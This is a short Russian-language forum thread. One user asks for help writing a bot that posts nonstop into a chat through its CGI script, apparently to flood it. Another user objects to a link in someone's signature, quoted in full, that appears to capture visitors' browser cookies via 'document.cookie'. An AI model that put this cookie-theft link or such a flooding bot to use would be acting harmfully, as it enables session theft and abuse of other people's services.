У меня одна проблемка.. Очень нужен скрипт бота. Я вчера всю ночь пытался его сконструировать, но мои познания в pl - не очень... Смысл в том , что в одном чате доступен cgi cкрипт, который обращается к текстовому файлу, я только пробил, что если сделать запрос типо .....cgi?бла-бла-бла , то в чате появляются иероглифы, если передать через post, то всё по русски, но отображается переменная типо: IN=бла+бла+бла+текст+текст..... каждый пробел отображается как "+" , короче _бался оч долго, но не получилось... А я хочу сделать бота, причём не с компа, а с другого сервера, чтоб постоянно чЁнть п_дил ))) У когонть есть соображения????? Или подскажите ссылку где бота скачать , а я ещё помучаюсь...
Ты дмитро вымусорило, убери из своей подпеси эту херню http://antichat.ru/cgi-bin/s.jpg?+document.cookie; стража.ют ни виные люди
бот Да блин.. не работает он ,вы уже зае-_-ли )) по теме ктоНть лучше пусть выступит??????? Или мож кто подскажет какойнИть адресок, где можно скачать чат с ботом без базы данных, я в исходниках поковыряюсь...